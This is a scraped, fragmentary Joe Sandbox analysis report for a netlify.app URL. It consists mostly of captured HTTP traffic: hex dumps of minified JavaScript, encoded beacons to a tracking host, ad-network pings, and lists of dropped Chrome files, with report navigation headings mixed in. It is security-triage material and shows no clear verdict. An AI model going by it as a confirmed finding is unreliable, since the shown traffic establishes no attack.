2025-01-12 00:33:23 UTC	1390	IN	Data Raw: 61 72 20 64 3d 22 6a 73 63 6f 6d 70 5f 73 79 6d 62 6f 6c 5f 22 2b 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 31 45 39 3e 3e 3e 30 29 2b 22 5f 22 2c 65 3d 30 3b 72 65 74 75 72 6e 20 62 7d 29 3b 0a 72 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 29 72 65 74 75 72 6e 20 61 3b 61 3d 53 79 6d 62 6f 6c 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 29 3b 66 6f 72 28 76 61 72 20 62 3d 22 41 72 72 61 79 20 49 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 20 49 6e 74 31 36 41 72 72 61 79 20 55 69 6e 74 31 36 41 72 72 61 79 20 49 6e 74 33 32 41 72 72 61 79 20 55 69 6e 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 33 32 41 72 72 61 79 20 Data Ascii: ar d="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",e=0;return b});r("Symbol.iterator",function(a){if(a)return a;a=Symbol("Symbol.iterator");for(var b="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32Array
2025-01-12 00:33:23 UTC	1390	IN	Data Raw: 62 6c 65 20 6f 72 20 41 72 72 61 79 4c 69 6b 65 22 29 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 69 66 28 21 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 29 7b 61 3d 75 28 61 29 3b 66 6f 72 28 76 61 72 20 62 2c 63 3d 5b 5d 3b 21 28 62 3d 61 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 63 2e 70 75 73 68 28 62 2e 76 61 6c 75 65 29 3b 61 3d 63 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 70 61 28 61 29 7b 72 65 74 75 72 6e 20 71 61 28 61 2c 61 29 7d 66 75 6e 63 74 69 6f 6e 20 71 61 28 61 2c 62 29 7b 61 2e 72 61 77 3d 62 3b 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 26 26 28 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 61 29 2c 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 62 29 29 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f Data Ascii: ble or ArrayLike");}function oa(a){if(!(a instanceof Array)){a=u(a);for(var b,c=[];!(b=a.next()).done;)c.push(b.value);a=c}return a}function pa(a){return qa(a,a)}function qa(a,b){a.raw=b;Object.freeze&&(Object.freeze(a),Object.freeze(b));return a}functio
2025-01-12 00:33:23 UTC	1390	IN	Data Raw: 64 28 68 29 7d 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 67 3d 76 6f 69 64 20 30 3b 74 72 79 7b 67 3d 68 2e 74 68 65 6e 7d 63 61 74 63 68 28 6b 29 7b 74 68 69 73 2e 55 63 28 6b 29 3b 72 65 74 75 72 6e 7d 74 79 70 65 6f 66 20 67 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74 68 69 73 2e 45 66 28 67 2c 68 29 3a 74 68 69 73 2e 44 64 28 68 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 55 63 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 55 64 28 32 2c 68 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 44 64 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 55 64 28 31 2c 68 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 55 64 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 69 66 28 74 68 69 73 2e 41 21 3d Data Ascii: d(h)}};b.prototype.yf=function(h){var g=void 0;try{g=h.then}catch(k){this.Uc(k);return}typeof g=="function"?this.Ef(g,h):this.Dd(h)};b.prototype.Uc=function(h){this.Ud(2,h)};b.prototype.Dd=function(h){this.Ud(1,h)};b.prototype.Ud=function(h,g){if(this.A!=
2025-01-12 00:33:23 UTC	1390	IN	Data Raw: 29 3b 72 65 74 75 72 6e 20 6e 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 63 61 74 63 68 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 74 68 65 6e 28 76 6f 69 64 20 30 2c 68 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 65 62 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 0a 67 29 7b 66 75 6e 63 74 69 6f 6e 20 6b 28 29 7b 73 77 69 74 63 68 28 6c 2e 41 29 7b 63 61 73 65 20 31 3a 68 28 6c 2e 53 61 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 67 28 6c 2e 53 61 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 6e 65 78 70 65 63 74 65 64 20 73 74 61 74 65 3a 20 22 2b 6c 2e 41 29 3b 7d 7d 76 61 72 20 6c 3d 74 68 69 73 3b 74 68 69 73 2e 74 61 3d 3d 6e 75 6c 6c 3f 66 2e 70 64 28 6b 29 3a 74 68 69 73 2e 74 61 Data Ascii: );return n};b.prototype.catch=function(h){return this.then(void 0,h)};b.prototype.eb=function(h,g){function k(){switch(l.A){case 1:h(l.Sa);break;case 2:g(l.Sa);break;default:throw Error("Unexpected state: "+l.A);}}var l=this;this.ta==null?f.pd(k):this.ta
2025-01-12 00:33:23 UTC	1390	IN	Data Raw: 3a 6c 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 6b 29 7b 76 61 72 20 6c 3d 4f 62 6a 65 63 74 5b 6b 5d 3b 6c 26 26 28 4f 62 6a 65 63 74 5b 6b 5d 3d 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 69 66 28 6d 20 69 6e 73 74 61 6e 63 65 6f 66 20 63 29 72 65 74 75 72 6e 20 6d 3b 4f 62 6a 65 63 74 2e 69 73 45 78 74 65 6e 73 69 62 6c 65 28 6d 29 26 26 65 28 6d 29 3b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 29 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 21 4f 62 6a 65 63 74 2e 73 65 61 6c 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 6b 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 6c 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 0a 6d 3d 6e 65 77 20 61 28 5b 5b 6b 2c 32 5d 2c 5b 6c 2c 33 5d 5d 29 3b 69 66 28 6d 2e 67 65 74 28 6b 29 21 Data Ascii: :l})}}function f(k){var l=Object[k];l&&(Object[k]=function(m){if(m instanceof c)return m;Object.isExtensible(m)&&e(m);return l(m)})}if(function(){if(!a\|\|!Object.seal)return!1;try{var k=Object.seal({}),l=Object.seal({}),m=new a([[k,2],[l,3]]);if(m.get(k)!
2025-01-12 00:33:23 UTC	1390	IN	Data Raw: 74 69 6f 6e 20 65 28 67 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 62 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 3b 69 66 28 67 29 7b 67 3d 75 28 67 29 3b 66 6f 72 28 76 61 72 20 6b 3b 21 28 6b 3d 67 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6b 3d 6b 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6b 5b 30 5d 2c 6b 5b 31 5d 29 7d 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 67 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6b 3d Data Ascii: tion e(g){this[0]={};this[1]=b();this.size=0;if(g){g=u(g);for(var k;!(k=g.next()).done;)k=k.value,this.set(k[0],k[1])}}if(function(){if(!a\|\|typeof a!="function"\|\|!a.prototype.entries\|\|typeof Object.seal!="function")return!1;try{var g=Object.seal({x:4}),k=
2025-01-12 00:33:23 UTC	1390	IN	Data Raw: 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 20 67 2e 76 61 6c 75 65 7d 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 6b 29 7b 66 6f 72 28 76 61 72 20 6c 3d 74 68 69 73 2e 65 6e 74 72 69 65 73 28 29 2c 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 0a 6d 2e 76 61 6c 75 65 2c 67 2e 63 61 6c 6c 28 6b 2c 6d 5b 31 5d 2c 6d 5b 30 5d 2c 74 68 69 73 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 65 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3b 76 61 72 20 68 3d 30 3b 72 65 74 75 72 6e 20 65 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 76 61 28 61 2c 62 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 61 2b Data Ascii: nction(g){return g.value})};e.prototype.forEach=function(g,k){for(var l=this.entries(),m;!(m=l.next()).done;)m=m.value,g.call(k,m[1],m[0],this)};e.prototype[Symbol.iterator]=e.prototype.entries;var h=0;return e});function va(a,b){a instanceof String&&(a+
2025-01-12 00:33:23 UTC	1390	IN	Data Raw: 70 65 2e 66 69 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 61 3a 7b 76 61 72 20 64 3d 74 68 69 73 3b 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 64 3d 53 74 72 69 6e 67 28 64 29 29 3b 66 6f 72 28 76 61 72 20 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 30 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 68 3d 64 5b 66 5d 3b 69 66 28 62 2e 63 61 6c 6c 28 63 2c 68 2c 66 2c 64 29 29 7b 62 3d 68 3b 62 72 65 61 6b 20 61 7d 7d 62 3d 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 62 7d 7d 29 3b 72 28 22 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 5b 5d 2c Data Ascii: pe.find",function(a){return a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var h=d[f];if(b.call(c,h,f,d)){b=h;break a}}b=void 0}return b}});r("Object.entries",function(a){return a?a:function(b){var c=[],

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:23 UTC	665	OUT	POST /mon HTTP/1.1 Host: obseu.netgreencolumn.com Connection: keep-alive Content-Length: 2736 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: / Origin: http://www.xay.io Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
2025-01-12 00:33:23 UTC	2736	OUT	Data Raw: 65 3d 33 37 64 66 62 64 38 65 65 38 34 65 30 30 31 32 36 39 65 38 63 31 33 31 65 38 34 37 38 61 39 63 39 32 32 35 63 32 34 66 35 36 37 64 34 33 64 36 64 61 31 39 30 38 62 65 36 32 34 35 63 61 64 37 62 64 37 30 61 39 37 36 37 31 30 63 65 36 30 65 64 38 39 33 37 33 62 66 65 37 30 65 39 63 32 30 63 31 65 35 33 65 38 64 35 39 31 36 38 61 36 66 32 36 31 37 30 37 31 61 31 30 61 63 66 39 66 32 39 66 36 37 31 64 64 37 38 62 64 63 30 66 37 64 33 61 31 63 66 61 37 39 32 32 35 31 64 35 33 32 64 66 36 35 39 36 30 30 33 35 30 63 32 31 39 33 30 31 30 32 30 39 33 32 35 35 35 61 63 33 65 64 33 66 31 65 37 37 62 65 32 36 62 62 32 35 63 62 34 33 65 32 39 62 32 35 66 34 35 34 37 31 61 64 30 66 32 65 36 34 31 30 64 32 35 61 66 65 35 61 65 63 64 32 39 34 38 61 37 66 65 30 37 Data Ascii: e=37dfbd8ee84e001269e8c131e8478a9c9225c24f567d43d6da1908be6245cad7bd70a976710ce60ed89373bfe70e9c20c1e53e8d59168a6f2617071a10acf9f29f671dd78bdc0f7d3a1cfa792251d532df659600350c219301020932555ac3ed3f1e77be26bb25cb43e29b25f45471ad0f2e6410d25afe5aecd2948a7fe07
2025-01-12 00:33:23 UTC	276	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Access-Control-Allow-Origin: http://www.xay.io Content-Length: 0 Content-Type: application/json Date: Sun, 12 Jan 2025 00:33:23 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:23 UTC	1919	OUT	GET /tracker/tc_imp.gif?e=37dfbd8ee84e001269e8c131e8478a9c9225c24f567d43d6da1908be6245cad7bd70a976750ef80ed89373bfe70e9c20c1e53e8d59168a6f2617071a10acf9f29f671dd78bdc0f7d3a1cfa792251d532df659600350c219301020932555ac3ed3f1e77be26bb25cb43e29b25f45471ad0f2e6410d25afe5aecd2948a7fe07f52a13ad2a24710d14e681f2d1586d31c64e56ac8bf88b71208fe59f1d329e921c46bcf40e25c7ea8290ee95c400035db386ee683e99332bd06b442c316f0496f70bfc72f02431e24f97999c140ab51258fc6e279126332a5de6c7fd6d5431f2b436f0715a7902c701e56f2ab0b2093aef6298ee35d60013ee9f3e4869265bcd5d759bf079d5d3a63ccea9de6f13599d9b13a93350983f0c82a1e1ea3683aba8c063abbcaf1778807fc4eae965d8013d9c56d9c7c71d69338c722d795f6bbdea6fd4075e93daaa9ae7c433ebdcf71d2e113f01a1813dd405c85d0cd88c0bcdd70ff1b90d0f58838b62f3574937b6bccc2df0e37d7ec74bb11e0830dce37ef33024a5e8c6eff03dfcba874b4822ac419e0cf929b6b8d4d4f68fe481f5e72092687a023fa05d1cfa62aae9969ebbb2a9adaa9b13dc1f0e35f477083ee5252f0b1490242bbacac74e66688e037f2e62eb211bc23c1168d40c5a22ec60426e3ad94603b3e690a23151442d998e82c927cb20030067f83 [TRUNCATED] Host: obseu.netgreencolumn.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
2025-01-12 00:33:23 UTC	230	IN	HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Content-Length: 43 Content-Type: image/gif Date: Sun, 12 Jan 2025 00:33:23 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Connection: close
2025-01-12 00:33:23 UTC	43	IN	Data Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 db df ef 00 00 00 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b Data Ascii: GIF89a!,D;

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://heuristic-knuth-588d37.netlify.app/?naps/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Chrome Cache Entry: 83

Chrome Cache Entry: 84

Windows Analysis Report
https://heuristic-knuth-588d37.netlify.app/?naps/

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:23 UTC	748	OUT	GET /ad_icons/standard/publisher_icon_image/search.svg?c=%23ffffff HTTP/1.1 Host: afs.googleusercontent.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://syndicatedsearch.goog/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 00:33:23 UTC	800	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/afs-native-asset-managers Cross-Origin-Opener-Policy: same-origin; report-to="afs-native-asset-managers" Report-To: {"group":"afs-native-asset-managers","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/afs-native-asset-managers"}]} Content-Length: 391 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Sat, 11 Jan 2025 15:34:44 GMT Expires: Sun, 12 Jan 2025 14:34:44 GMT Cache-Control: public, max-age=82800 Last-Modified: Thu, 20 Jul 2023 22:48:00 GMT Content-Type: image/svg+xml Vary: Accept-Encoding Age: 32319 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-12 00:33:23 UTC	391	IN	Data Raw: 3c 73 76 67 20 66 69 6c 6c 3d 27 23 66 66 66 66 66 66 27 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 32 30 30 22 20 68 65 69 67 68 74 3d 22 32 30 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 35 2e 35 20 31 34 68 2d 2e 37 39 6c 2d 2e 32 38 2d 2e 32 37 43 31 35 2e 34 31 20 31 32 2e 35 39 20 31 36 20 31 31 2e 31 31 20 31 36 20 39 2e 35 20 31 36 20 35 2e 39 31 20 31 33 2e 30 39 20 33 20 39 2e 35 20 33 53 33 20 35 2e 39 31 20 33 20 39 2e 35 20 35 2e 39 31 20 31 36 20 39 2e 35 20 31 36 63 31 2e 36 31 20 30 20 33 2e 30 39 2d 2e 35 39 20 34 2e 32 33 2d 31 2e 35 37 6c 2e 32 37 2e 32 38 76 2e 37 39 6c 35 20 34 2e 39 39 4c Data Ascii: <svg fill='#ffffff' xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:24 UTC	401	OUT	GET /mon HTTP/1.1 Host: obseu.netgreencolumn.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
2025-01-12 00:33:24 UTC	268	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Access-Control-Allow-Origin: undefined Content-Length: 0 Content-Type: application/json Date: Sun, 12 Jan 2025 00:33:24 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:24 UTC	875	OUT	GET /afs/gen_204?client=dp-teaminternet09_3ph&output=uds_ads_only&zx=5ufhciitm2l3&aqid=0Q2DZ5GwDdGvjuwPrJSBkA4&psid=7840396037&pbt=bs&adbx=366.5&adby=214&adbh=511&adbw=530&adbah=160%2C160%2C160&adbn=master-1&eawp=partner-dp-teaminternet09_3ph&errv=712519386&csala=6%7C0%7C987%7C1235%7C249&lle=0&ifv=1&hpt=1 HTTP/1.1 Host: syndicatedsearch.goog Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 00:33:24 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-MChcZAoM2F9emEPmga0_bQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Sun, 12 Jan 2025 00:33:24 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:25 UTC	874	OUT	GET /afs/gen_204?client=dp-teaminternet09_3ph&output=uds_ads_only&zx=lwf3qohhv0j&aqid=0Q2DZ5GwDdGvjuwPrJSBkA4&psid=7840396037&pbt=bv&adbx=366.5&adby=214&adbh=511&adbw=530&adbah=160%2C160%2C160&adbn=master-1&eawp=partner-dp-teaminternet09_3ph&errv=712519386&csala=6%7C0%7C987%7C1235%7C249&lle=0&ifv=1&hpt=1 HTTP/1.1 Host: syndicatedsearch.goog Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 00:33:25 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-4N_f2unxIScXD3QEQcxWoQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Sun, 12 Jan 2025 00:33:25 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:26 UTC	401	OUT	GET /mon HTTP/1.1 Host: obseu.netgreencolumn.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
2025-01-12 00:33:26 UTC	268	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE Access-Control-Allow-Origin: undefined Content-Length: 0 Content-Type: application/json Date: Sun, 12 Jan 2025 00:33:26 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:27 UTC	665	OUT	POST /mon HTTP/1.1 Host: obseu.netgreencolumn.com Connection: keep-alive Content-Length: 1693 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: / Origin: http://www.xay.io Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: cg_uuid=de8e8a5741eeb907a45920c2f7a55cda
